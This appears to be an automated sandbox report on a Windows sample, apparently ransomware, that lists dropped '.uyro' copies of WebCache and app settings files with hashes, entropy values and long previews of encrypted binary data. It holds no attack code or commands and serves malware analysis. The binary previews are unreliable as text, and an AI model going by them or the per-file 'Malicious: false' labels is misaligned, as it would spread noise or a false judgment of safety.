Preview:	.8...F.!k[........=....9......s..$/.&..y_.,.r..q...le.~8.7n.jP.d...J-.z.......A%.&.7zI..?..-/....,=N.v.........~..lJC.B...H.4A..oV.-.>^.K.....+b?..\|Z.z[.....j.=I......x/.V...kt....;..Q.....B..~.9......E<.%..t....,~.P..{.E...%.<.Aw.2.U+I....n,.=..+.U ...{.L.h.......W....W.......P....JR,.j.OjM6..D.]..z....5..v'v`..Oz.;.R..H...L+4.....{...a....qX.8...~..]<.....z>.y....E.M..!.....T..PL...F.\|}....Ry.]......#q.n.$.!....9/.8.}.3a.T-)b.'t.b_...W..>.-.6... .Cn#.q.Y-.......Jpr...g^..~..(...'[E..c.E...s....."..[A.[+e..&.=.k..K..~qQ%.O@Z}0b.~...xQ...b.%.g.x.....VFT.%.}C.HK[a..dJG.b.O..A8.%.-T....T..%....)u..E+g..U..n.....d......hg.`........X..<...F.2.;......J..E...K......"...Zp....A%..C,&_......Y.{C!...%...\:.I.1.....O.d..3..M..Fu.`6....2V....@........l.G..)P+..Ne.]...&$.#..Pp._'.U..2...Q.k..3....:..t.".L..\|....#.<9q...?.;E..!?.....(..qX.......G.7.R(.M..C6N..-.[\|kdI).....'......U...X^..1.."j2.7K.7-O...e<.%5.o.r.m)P....a&7!#...c[....~z...2U..7]u....U: ..\.

C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01res00001.jrs.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	3.2070092514043593
Encrypted:	false
SSDEEP:	3072:+41KHbbZFdmgjd2bVd5sKx1yu4Y5fhB/XKu3Qwa4pWUZkKX2:BaBmgp211x1s477QwFdk62
MD5:	EA72A5AF342FDE2115001D225E3092FF
SHA1:	FB630D85CC263D0ADE8417997E7B98C473958311
SHA-256:	9120EB80926C3DCD9716892258C9D0812820BCF83E9F55D80AF53460E59DDBC2
SHA-512:	07253AD48704A6734539193F472EE41A33AF8010DE481537C2E9976A3DA251071377C8D126A038AE996CF53B6D91D1B6BACD58686A1D9D1602730A8802284FC5
Malicious:	false
Reputation:	unknown
Preview:	......__.9.....c.odT..T.J.....]......#d..m{..>... ..G3...>L;'25&.=N...............5..36R.G+m.H...b\rV....T.M.......I1...{.3.....]..A.\.0{N...)(^.P%........[.~2.."..`.?...!..-..z/o\.n[gq.=...Za....G..9._..[....<...W./..M@.uW...".y...Oz...o.J..h8..CN.&Kt...:.&..aM)..1.5N,. Pb.1...$...!f.1...a;..1U...W..gA.f......p5,.....j...~.....(u_&`....k.d.r...l...p.d.......J&..t6....X......]_.%l....P.v......%..&....3..&5w..MZ.Y?c...J..........!..........b.1.....<..l./"...........@....>D.D......m\|..%?..9l.X.:......&c.E..W7..".p......2M[....F....5.Q....G.UW.&W..$.h..X.....i.....e..,.2\|=#...M.C.2..U....H.....3(.?.Z......z.pE.:..r..\|..G..+..F....7(.v=V.$...U.z.....X....r/....0..f....w .o.~Q.m.'.`].p.....M..u....Zw,.M.K!.........I..8..e%9..u.....e....7.I....!h-..^.A>..z..-.....Y[.a.G.W-. .[..w[Y0..4.p...)......rbb<h.<..L.......W..5..J(..A.e.'.Q..+..f.....t.S].p.+.n`XEX...Y..2`A..9....g.l......:...v....z7~..~..5._P..T.(:l...c.H9_..=g..^&I.x...D.:?l...oW.

C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01res00002.jrs.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	3.2081125766772547
Encrypted:	false
SSDEEP:	3072:/jPn+0LDK4HyFF24fHHsEwYMn2+14PBtMJiabYrKdaMviUis:bFKSyFF/WYc2hB2Ju7MvVis
MD5:	DF4C86256AE71355996753702CB5A265
SHA1:	9EBB2C66F52C0E719C7563DA5E75B83D3EA93BF2
SHA-256:	B652B0DE387633A6B367B591869D5608268C92142F22CEB85969510A98CE3BA3
SHA-512:	0F6801E71ED916862865212C79F2551EEB14A75AA0B97AF233F423D52FA2713AC81DB2D5F540CD34D5937E2A5DB3891180331ED5B6BDDC0CC4E3C26374CB1CB1
Malicious:	false
Reputation:	unknown
Preview:	.......+JZ.f....M.rM...O..'Q.-.e.U...O.R.).wt..K..#.^z......<n......)....A.<..M.pJ"`...K..@.O.=...z._9.^...shF.......8_...LU...z..?(..`;K..yO...p(....5y...{......c..1.n~.WN..r.8....4..g...3...lx#.j.......\|.S._...<.:..wh..k.%.........\|k...I..oG."&..g......Z.p7..../...Tq.Yk.jF.....P_....lr..h.....T..(.Yej.B....X.~.<S.-6\|.^..........7..;..... ...=~.R.........L....&_q.&..u[.F...L'8...Un.rI3M.1.Q..&...FO.W4...b..;z.....r.1.l.W.1....g...v.)wJ..E&.......FT.G.s.;q...I.....P@.....l.........tf.L...s.u......Y{8d.$kl...z.r...,.....{s.Nec. >.XU.....:.j...r.`......6.&..G.....V.=.s![...Y....p.Z...zTZ.j...P.p.z...1.!)..:...i. .........0..Q&.....e...c.P@R..1...8f\...mPT...W.8.b.qG...^.A.>.[..f../....$&Y.4..W....vA.....\|..w=..p.+.../b.....d.../I..R_.s^.)...K.....YBU.......V. ..={>.F..&i[.T\5..14.2.p..h..\.e>}q+'Y.2;...[.....h.".W@..-....i.m.[..\Q.m...Z....?.Ge..<i.%.l.>o.zzs.7.'}..R..oL*@..J..N.V.B.].9.[.%>..bM@,vP."..-...r.....6.\. ...$..

C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01tmp.log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	7.316377527070837
Encrypted:	false
SSDEEP:	12288:lyYoiv2A3A3SsMh6+3jhmhrUd5dFdVAD7:lyYof3SL0rP
MD5:	C3081FEEA524307CBCFE594F5FAE97E8
SHA1:	EB3FEDE3D6119A056FC6AE4D0F7507F5D44069A7
SHA-256:	8914546C0333EC1CF54E4DB77306F272182512DD3EC6600C9541B7CE9A0B0799
SHA-512:	B55CE4AF8E63FAB45D417B4291862866487BF505EB72BBC4CDAC6E30467EE099654A045CF49B7A5A5D331E311159F2E8340D3AE001D7852CCF1F964858222A73
Malicious:	false
Reputation:	unknown
Preview:	.....G.i....(.?..UM....!._$4a.............1...\.t..l.....}]S4...'.?.`i\|h.&.".g........)+.%.6...%.t.d^h.X...S..3..\|...Q2....{5..e\..Z........Pq3n.. ....o\|\|-...R^....z....^........p..}.+0.GqaR..Az....{.......N......H.......h{....]..\/.(z~V.uw3.O....%&%.l29.[....iX.........L.9q...J..!...O......{....\|i.S..).-....!...TF..8.....<......(I.'J%B..H.1i....'......(...h..QE...B]...}.......6r7.....#..UK.$.....#...JX.iMR..?..M\|.H.u.........X.S.....(e.H....6......r\|.0..m<A..9...9.....F..$.\.SJ.u..................kI....XS ......6^k0....CK....8...x..C\/.`l...q..l2..-M....O..'.c.lS..`I.z.....\|,._@...c..w.D+q..y.$.x.x...):+D./.H...r.s.\X/-*Y..zN..@.....vCH.V....\%....{.......y.a.:Z....n...P....hyG..{.w-)X....^w.{...n...)/@j...)...1j.g.2.v.<....-._..F.B(.p%...J.&J.....'.N....R@mh..d..e.+.'.w=.ZeQZ....6,0...oqh.........YN.....[...<....h...... f..^..`.'.......//.,x.<1..4..a..\......7..rA....{..G..".... .{.+..Mb....Q./..M0>j..e$H\|.%...@.58......m...o..

C:\Users\user\Local Settings\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976624794714371
Encrypted:	false
SSDEEP:	192:gMsu/HLRb7dkxJ9uxKJOaQXPESR4nVg++syGIlMDh2K:gVu/rRW9MKUXPEbB+sy7lMDh2K
MD5:	53ADA4C3F71582F176EB1B62ADEB8F29
SHA1:	1636849E59684EDAAC4E37C2D2DA05010CB83E60
SHA-256:	07F0ABB2E41E37809E3D4C171848AA02A81EC7BF8BAE3F3644AC88D8DCC0970D
SHA-512:	A79B26C3DA3E8710F989BE5BD878EF6F6B036CC065A8EFFC0D6B17940BF925AB015EC52A1310A4E269C1ED628D657F5A7B73688C8A9C5DFDA31F5A195E88846F
Malicious:	false
Reputation:	unknown
Preview:	regf.8.b..{oZv$G..U...(q>.s..qe..(...:...L).i.22..v.'j@..gd...V.%.=9;.C. K..A6.p..5.p$...Y..o.z?./\.....l...sgHP.V..kD>yAzwa...,."!]).GD$e%P.r.1....z...&P..!.-.?.......h.%X.....>@#4.3\|{c....g....3B....8...Q.3R...M...O...z.^....`.Y...&32._..p.c.?...#.S...=b..T.......}~C-L.^.S.z..U.s..@!Q.2i:..<VXVU9e_...r.....l..6...W....0%4.4.~.lV...7..;.K......hb...V..c},..+..(.\|..v4)...E..a..njP...<....B..f.B..&c.a0..#;...AF..Q+\r...2".O.&..)k~?4r...X.9..<..\|1./Iz.!.AG(Uk...'...\@s........'7.:~...D.3.Krm.T...`^.6.oI~~.\.n..Q".\....r.......z.\|/4...H>ug}.........~...P...kcYN.....!f..bQ@NNi. M..n....j.VC0.H.#./=v....z..$...0M..`._.3..C;...v....B.z..m~s-}..z...0:~xF...q[...<0j.7k..;.p3....<87."..c......&S6...v..D.....o................z...WW.....K.]@.:6.Z.SU_....{..47.....Eey=...............W..KVX...m^['V'..2.....u.>.m.[..\|...m..PX!H..0.....L...Y..}..0q.=..j4j...c.h....[gx..m}k......).....l.6A...w$.,..6.Y...5'.'!d.,.C\|0]z..8U.%..6......G..g.{.H..\|.g..

C:\Users\user\Local Settings\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.981480674760083
Encrypted:	false
SSDEEP:	192:0gBtMfe/DNFr9qkrV4JHe3BAMdKooqw1wQYXylO9t2znBJ:2eTr9qkJ4J+3SMIxwQvlOjMJ
MD5:	0A47283AD2F32A740DD2A43CD2DD9D83
SHA1:	EB173A13B0FADD72824ED38EB40456DB4A6589AD
SHA-256:	F01BAFCDCF9042CD78C8C6DA6124D2F284D1A7CB7E16506F74B457E74260EE08
SHA-512:	FD07EAAA568D8034116A830255E46F464F6C5DC8AE7EF8780E2D84BED1A3B9D647DAE43552476B9C4CEABB9DF5B4FB8EEB8A82D84783B5A343DFBB0677873582
Malicious:	false
Reputation:	unknown
Preview:	regf.J.r<._.\....M....\|.....W...~.2...?T.[(Y...]A.......f...Gm...(...^h..a..AG\=K$4-.s..........Md....B.>LT.k........"...c.F....bM...8..]..,N.....'..V[.T...j8x.M..u...K1......?~,...Oi..c#P.....m-..p4....O...u...-..S.2.7....X...w.@.O..W..v..<....L."...!..%.+..?......}`!..Z..........nh.Wi.......gn...E.-..`....}...O...'p..UNi.4 ..I..=5.N.pA.h..fH........,.mT.d.4)%.R...gkK.,L..j......YJ.f/6.=S.... #..`.5.k..$......;........q@'q..R.....XH.bG....E.g.RF.....6.K.{h...I.n.......i.i...'..b....=.w1.".y0$B.........gJ..19.t...x....$"....a.F..f..;.$,.<5...,......B.../t.\.....B.U.cP-;:,.$u...9.D.yCw]..d.}......>.e....r...G...`'v..=...(..[...C.o......s..`R..`{5..g. .j.Y....~..M.WL.>U.........T.i.(....R0.....P%.......5#.kJ..{..<(..c......r!p....N..'....U2aYG.ZGt.hn}.A?.........e..e.7...l.N..k.x.+.+5....../.s........z:~o.......H.%`R.h.C.=.Q..e)R.-...\|.I(U..-....a......I\\|,..V.N.#.....?.ktu.?<7v........ZL>......@....I.WLB.D.$.LH.U;.....\|g../X.k......q....".

C:\Users\user\Local Settings\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.975178260828631
Encrypted:	false
SSDEEP:	192:YqDbCgbCHn8Egxdi3X/86F8hwaaI0nDJuCkzn2B25q0vkuO5EGhfwWI:JDG/H8ViNF8hL00nk253kuO5EKI
MD5:	DD1AC9E01CD6EA5F2ED9C55A5471E770
SHA1:	B3ABF2800402ECE13AA6ECE08DBDAC574C54756A
SHA-256:	625EFF468FA08C6A4512980E8790C2DEEA43EA7CF167B652BBF6257E813CA6C5
SHA-512:	BE3E3A476A3C011F5972E328168C9BFC0C1CAD1B4A8AFF6362C40D70291AF17F09F77FC8F484BD25E81505FE08318EA773F9532F4B4BD318B3FDC2D5C97C03B3
Malicious:	false
Reputation:	unknown
Preview:	regf...V.G...8.2...C\|...z.--A...@}.P.V^..1a#....I....h..:...f...G..\....jx..?....n.,d..c..r.L......b.....w....P=.\..?m...w.;...p...\|<#.6f..J.{1...)\0.!.y./....(../k..k.a3{...p.....7._..e...q..F.c.mS......@.m.....w}.]...0......Ro.?..(0.m.B....n.....^9.......F..%...-E..M.i..tU..K.`b..).....d....*...o.q\.J...tP[.O...>^.QS....7Q.......)Y..`.zh.h...........[..3.d..x..6....nT.<.q.9.....a......o....`W.t@....#...p...-.Rv..n[....#..n.N...f~2...R...W=...}..T~.y.~.h..byR.o##....e;....)yw.}._.4...b.y.\|......\|..06...).....l.A.i_..l.QF.g..:,St5.....f~Mf..A........~...P.\..Y;.....-zhw..#.y.#&..I.%..QC.SW...7d..L;.e<l.3.3M^.N........r.....&...T........2.....7D..!i.b.a....x..S.[.....q.U ..m.X.IF..J9sK.#D../3.ME...(s.I.......F.?......b5...55j..D(J.5...]...).F...W......._.w#S....&.......A8.'.....Z.n.I.m...... .I .ti..e+7TP.........~.O....T....vpYY.A[..:./n,E.........G7..o..=.k.!.;...q......... jdZ.A...q..2..+.R..f...?W........G....>...j.o6....

C:\Users\user\Local Settings\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976562284636702
Encrypted:	false
SSDEEP:	192:d/U7hBSi5lrdKVbpjCk4PBxm2GhlTSkbulss5O7ayQ6VT8D:9U7hBSi5lrdKVbIBU2GuolW6ayQ6VK
MD5:	4A4330C3897D7CED926E35EA14AFB04C
SHA1:	48755CBF7BC87A0B519F6F0ED1B6CEDBA5BDA386
SHA-256:	AFE1AB2E4BC78FB783DD2A3B234578B75C9D8164B390E053909D4B7C873A770E
SHA-512:	D0F8CC346473D750DBBA46410EA3C456BF3A43E51250D1DABD08FB81918876DF87F8B83185A63DCFF7B83BBF1E2110695D5AA118EA1448389CF05AE8A07DCBF5
Malicious:	false
Reputation:	unknown
Preview:	regf...k.n.\|&.\|r.6..+...]..!.y....y..V..-...WLCj..(...W...NU.-.....D.&.-.w.%i\.;..B.-C<Pj..,..w.\.0..>h.......!=yW..X.6....F#>.?..e...l...9..t.]..4...)0.v.=.b...m..m.:3.~o0..y:-Y..F.5H.. ....C0...H21..r\|....._D..^j..De.?,.Gh..$.j'.A.:<]8....ZhQ....D....q....._h&gMv....:.9...b.>.y..._........r.9.e.O........$....B..g.f..g...N61........g..%.et...y....-.....g..YpoT.f\.K...9~.....K;.l.".$.&.....`(Q.Q...x.z...Z.=....&n,-.n4.F..}e^.Sf.r.'...hY.5.j..1....~s......+.=........^...j.(..:.6..X.U...n..P..T.u.q.b..#.Y...o...F..\P...GV...+...=.O^.fA...;.}..t....E. u.f:!..!U-..].i...^..R...^.....2.....'.........,.....t.5D...E-_.<...'..1e.O2.c.......,f..jN'.b....2.FQ...x..y..%.....T..%.zb.bO9..0.L....p..A....!.=...F .nsH4._."+.."..N..] z."p.1...oI...V....z.+c..n7.K[._65/...o.:8..Zdm....X..5>......,..J.N...D.....s.4......\......9.i.6.oR'...b..#Cw.x..[v.....J......$..D...g.....`.{P%pl.e...h$.~9....;..`,......k.c!+i..mDZ.HuM.a....).&..w.Q......,........

C:\Users\user\Local Settings\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.LOG1.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.980441568005906
Encrypted:	false
SSDEEP:	192:V4olCczRSJu7MeLXGpEYJcqJ5Z24v7P4i79/CYvrbSBR:VjpzRvMe5Q5b3TJfTbg
MD5:	503C973E74649CFC8040C887CD72429D
SHA1:	A8CEC23FD522FFB00B8A54B45DF3788765C68A8F
SHA-256:	8B1336312DC7807CDEDBC17E9FF9C276FD992BA798C2A08C55DA863A282EF330
SHA-512:	D13DBA113BD1FF04643027B8DF1343DAA0D04B37FFA3E42882C9BFB7BEEB3FFE63AC01626F53240EE0C71C70C8D3FEEDC14938FAF376EBC97B8F8020DB349EE8
Malicious:	false
Reputation:	unknown
Preview:	regf.h.^Knh.X....!.5..........K?.....r.W..k.}.!.......4\|...i..D:..N.6.MU.'.U....,..S~.a....2#9...-.!.....r._.8.... }.+{..]j.p.+.....l....;......J(.....4P.q..KY..Z.js...@....+..kY..?.Q.#\|~.D...J.6ByZ0..Y.. .k..c..K....=.'..h..H........m........`A.,.Q...^p........e...h...j.E.9q.N...../.V...+.......U.b .I].G..C5.c.I&.@...x.L~&.....A.l..`mx.0.\|.....'.ib...:..8..3.CT..e...F.)E.c...... \|..r..;d`..w......7..(n.e..3.\.&.X..RN.q5...uK..<=.z.........+[-^........Sl..t...V.N.tN._G....gz2.B.9..!.B^......;...<>.>@.MS.F...&.........F...d.JFP....}V.....MwF.'.%.....1.![.oAA.....d.... .H....V.K>.....;...w..MsjpGNLi.A,..5j-Z..tN6.B........<FP...s.....^.fM..+..d-.Z.Lq..P..Q.....i~..v...X...f.....6.O.........@.^J.W...?bH...?~..3....J..........8`..l<.\..uj.&.Z1.]......0P.@..a.....[Ay'....0...6{.?..JT.n4.U....:.c.<.(...v.....:.....m......\|-...Q...M...]...-"z'M..:./....@...,.s.S.Z6.]/^Q......vr...\..._..A7.....E..9.......b..(.C..+P.F}.e.X.K-.

C:\Users\user\Local Settings\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976237306102046
Encrypted:	false
SSDEEP:	192:Mqael7fKEwf2fCq9cXJgxWGnAgkfbmi55JKOjez1mkSrG5rR28t:TtSf2fC/gdAgu6iLI0e2q5cC
MD5:	E6609949D12BB133A569E2B6D7F152EC
SHA1:	172B5F176221DDDC7D54F685A40699D1CA5C687F
SHA-256:	15C38E347562A0F02FA16D5C32CC11E16942D02F97F3BF92388FA6BAEFA10103
SHA-512:	7A0E2AB3719BBD273520321EE90069CABB02519464A38444DFC099A9A2D7A5413226C2AC5DFCE70BAF8D99C859F78B0C024AD1060A639374F288A7D1886161FE
Malicious:	false
Reputation:	unknown
Preview:	regf.<..,.....o.gi9..b......(,....1I..F.0.......y...s'.b...<y...d4.GL..`..+.n..<H.v...K.....d.T...j...sl.(.K..<..m......]...%^p.Q......p.....]..sv....Z..#Mf..._...7...n.C..@.th7.H.%.L...!..,[Q.W.W.,..e...mB,..A.N...6`.O...Xl.#%.S....5..z.`..Em.o.x.+.._....to.5.U,p.ts..H.P.<.^.......[.:..$a.#\|..S g@9......=s/..z.7....8...6"}.l.@#.Y.....".s.>....}A.^...&.7n...`.YEZo<.(.;E&w ...U.i\F...?...j.RH.(./.l=.1.W...DL`. ..3..1..\U..^.o..2.j.....p.v.X..l.....I....8j....z.]..y..fj..M...p..V.q.C.X7.P.y.p.B.....7.g"..n..Ol-7p....[.E..7M...D...M....`........I.......M?..Zt.J........'..U...7Z.4E\|g..Zs.}.~,...t.Wh.V.C.....U...s..x...X...I..wo...C/..X.......BL+....~.zW. .^Wj....3.9.h.b........35.Q..;.7G...x..]cj.....N...>ww...(.R.....q..9...J......x..y.3.".\|[....TT8....CC....."..."..B....h.U.)...Zs6*.hj.9....g.H.}j.y%..`.0%.Gh".5..y.yq.....%.k......:..`.F..o.:.n....t..+........\|.'./.........+[P..3HK@...,.e.[\J...D.N^<...V.Y .I)..(.......I....]R...7....y....9\

C:\Users\user\Local Settings\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.97970761081618
Encrypted:	false
SSDEEP:	192:AMfDFzXpY1O5d8YsS6V+sO4ROic2OocwnByGub0:AMfxzXpYQTmViQOSx
MD5:	251B53CE435A14BC8657D89AD8080FE4
SHA1:	1752249BECD4EC4BFE32034EB2FB9FED2DAC1979
SHA-256:	2AFECA77EB07DE08B7DE1920D99CA2CA87B136E370FE42C9C4A23600B92D935C
SHA-512:	60217C14352B4E6567DC4EF084E170E800A7A43FA76948BEC651E8B99DFFE33F9660B6A23ECC374FA15F949536811B74B4AD9640D6DC2C028BF60C47BBEC6751
Malicious:	false
Reputation:	unknown
Preview:	regf...B.`C...[Z.%w.\/\.O...._Q...u......s..jYkX@..!.._....$v]g..+..&..f.....:....."..]o&Z........y.H..pAi..MU...._.4.i...\|O........CE3{.....s...a...o.^.T.r.r..VD...._mH.h...........4..K$. Yca...5......'Z.W......b..9.8...}.F....J74FB....Y;...."A./.Sb....!..Vl......MT.......pE..v...\|\|l4.J~...~..P9.;.6@vb........x..t.ip.......#...u.<5Q.C.t....hz.@..n)..8..Shl.!..u....RL..d...dp..ze#}.E/.UO7f5_3.3}....u.EN.N.Oz9..o.[.D.P>%.A."8.Xi...O..B..t..f.......k.L...Mc.e...$....M.6.p...u^...?.{,Y.C-....,...@.itx..T.....(T.....We...f...!j....K.~\._.0=..l.....u..8..@.4.....`6...:.R.h...".;{.C..7.....?~j.a@...~...`.....VX....+g j..+...&kL.s[D.:qj...M._....1......]..;.Q@;.Z=.[......d_;1..... ......$.g.'9.]&].he.....y....Ao..^...z....].......RdG}..,....V.. .o.YU.V...N.Y.\....@hJ{....>..]pJ..wL..Ib(..24.......w.Y ......R`*....jFeC.<......X.....qt.TX...!..n.<..N...A..XB..?.b.....$3..@@..z.....Aw.).C.Q....?..m....0.x...).{}....uB.C..,F..Eb

C:\Users\user\Local Settings\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977452995194849
Encrypted:	false
SSDEEP:	192:sizVyJQnMBlTHX63k1QLMnFSamwD2paJC17U7cZghNL:siYlq3x1117kcc
MD5:	55FA8B81E264B0B5F80170FD9354642D
SHA1:	6B8BEED35F9B1F4BB108A47FF2292B7DFFFEF238
SHA-256:	84026BF1246CFD96785D914F5521BCA9BAE616D3FDCAA0910A5AD6485FCC9551
SHA-512:	A41E1CBAFFF65F9ADAEC0DEEEC07FA100FC80692ADE56F7DCB5A6FB719FC5E7072A6FBD455BA732DC16D280A5C8E1506A41EF68D47AC0DCB95AF55A7225F2F43
Malicious:	false
Reputation:	unknown
Preview:	regf..\|...~.NZ\8....f2~..P.z......d...z..u....uya...:...B..WC.....Sge..../...........Y&}..e...,.<lM.dL.]}..i!......,.....O..k{..$..5.[.O.0.L..mj0g......tI....Qe..H...7.n...?ea..\s..p..M4m.K..........=8x........J3,MPw3m.O....W\K.LR.O.$y....l.....!2..~..T.....n....d..I.-..q.;......k..x....0.....x..O...o...K.....N.96......,U...k.m.eS.-...)DY.\|....)m...+...^r...5.z..SY...~..1.........0........~....l.F\|.......$.)....@.....W>...@.c.CP};.V...\|j.G..#zd....gZp...wD....Jp.....A9....{H.!..t/[._..;..).{&..R<5.,.&D..k>._....>O...@.:..I...E...B-lq&>.x....cA...U.%..-..c.....=.3L...5.?.p_...n.......Q.....f33zr...T......5..xv.?...{-..Q.q...m....C]S.......n..H.-.N.?f.e...b7..v..v-i>.v.."8...=.z.{i<......y.@..,..W.....k.._G..$2`>..E....J.`...NB...%..Vd....L.zwk.u...?.C.....0._.I.E.G...."^..(..?.F..<......."c@.l..8..i.$....m.g[\|..d..{..........$.g.".?X....r....}J..v.-.."..x.-....5/..6.}... cz.j"..p.......\.SF..q....F..8.;...;+..Z,..w..`.-Z7iqO

C:\Users\user\Local Settings\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.LOG1.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977480908285455
Encrypted:	false
SSDEEP:	192:Fyq/NzLefSgJEXdRDOLGePKvWvJf6m8bLkgBsLA2:Fyq/NzLqwdV0T4WfT8bLkgiLv
MD5:	6EA441B095FFE4090E6076D7DF537575
SHA1:	3F2B55E387FCEDDF4E9C7C55A588409C251DB131
SHA-256:	6E5790DC2F1B6DF1BCB512876EC7F7A3ED544B5488B1CBDD52C000CDD5C306D4
SHA-512:	74FC7D94CF21B8C627FEBD104A8424EF85DD3B7D56AD3A7213AC53DEF2D8F04C1C243703A7AB743100561DF2FB899BD453D8AFB1077948CD7AF262ACF6290CCC
Malicious:	false
Reputation:	unknown
Preview:	regf...iWn..2..b..0w+.8^.o0S\|{d..........p..o.IW%@....U..\..(Bw.5Y....Z..0..^....^.@.3.D......rF.q.\|................+!..S.`B....`z.c.d.(....J.Qo..WUsT.. ,M;2+...pt.#.....w..q;...UM... ..Vl........+.$.....Jp.d....`....>..^.x.w..i.hA.9_...%An.`.^.........tbI?..H_ir..4..e.15..p.A...-P.v^.........iD.,..O..~{...g..Z....v..)..0..H.#3-84..2...Q...A.Z.m`.C..)ed.06.q.x.....1.K....1k......K.u...w~...hL..G..J..E.P.3$>Y+.R..F...eB.[g.m.`.....)..m..)..+..R.N......(....I\|.$.O.{.n,7....d.C...u.t.w<U: ......^;.yPH..v..{..uo..#.........5........w.3.j......m9%..r......X..V...P....t........{....V.sK....a.2..vnZ....c..z.>..}c...a.V.h.J...QyRkF?N".N..Ld.:.^.>....Bu..Y..5s...w\|..{HH..b.=OV....,..\|.Ve.5.>.&Z...\|....m.Q#.W....u./.e...&].^.i....p.....^{....t\|.f.V...\...6...$...`b....N.!...LQ..'..UVdc6=:&g....~..g>k}..)....MH:.[(.a.v.}.......FP\3.j...W(<.W5D.y.D..)K.%.5...#......Zh.<.Z.+i1..V........[..Y..4f.Dx..".Q...Q.??..U..... qS......3..JL.5g.n.8_......V"

C:\Users\user\Local Settings\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978625733700613
Encrypted:	false
SSDEEP:	192:042EflXYRLwxu/jRIGZWmS6pdT2Z6xjwlbeq9KH1sGtKOZB:D2ilYLmu/jRymS6y6xUlbepVsGtbZB
MD5:	49DC09A83E408B582DF3D4A0D4A6D6E4
SHA1:	DF11ED2ECF2FB3DB58479F93FAE347CB8623553E
SHA-256:	018F8E54989A8BFDEB4A2FE709780F42944115DBA437A5BBC16D06A3B07414A5
SHA-512:	9CFD3131D91CD5A6EAFCE9B8CFA8145496C6251581A77C869AAE4C6222542A146DFED36C0B540BFF0137183AAAE44D265BB535FB489496BC8777031846AB2989
Malicious:	false
Reputation:	unknown
Preview:	regf...:.....Ob.J......l...#0.L.......A..mf>.....p.....n...^._....s.g..UM`....i.c.4....F.Z.9.1T.t.6....1...W..$#Y..=.,F(....<...nw...:.....p-....E.+.+..(;\.....il...n...r...+k.....R...\|Y?l....YP[f.p.V.Qb..K./_Z....N.$.SRQ.....xQ>...W..m..a.h.0.3.....1sK..........(...(] .....8.....k..........(.Xt...t.....~1....FOE..c.~.9k]@Q.....(...H.....$......./...."..j.. ...Mr..8....c..S....Q.W&....A$v-..zP..P..."N...o......EY)o.eV.....k..;.......^Nio...........D9..ipn..0.....p).v..,..$h.X..0...zf..h7...%T.t...R.?.E.d....../..ob...;/...-...D..7=..q9{p.......Ad.. z#...@.K..3aG.u.9.%..ze...........Z.-..$e....V...^..BT....4......(.M.9}T.N#6.H...3.lYi..331b..f..U....#V...c[......Q...O...Vo.......B.<...C...5...S...D..(.?...w.......EF...,CO....p.~#pt.\|.32.'...9..........d..........{...h4..d.q.C9]CH!..2D0....TH....B.#.q...J...3.S.#Ki....L1...m....f...&.sK.4.yKO;Y...oO.k.P.a....3........(....*R{'.u....{....'...j..l...$w..]...6.{4\u...S..l...o+...

C:\Users\user\Local Settings\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977859593891822
Encrypted:	false
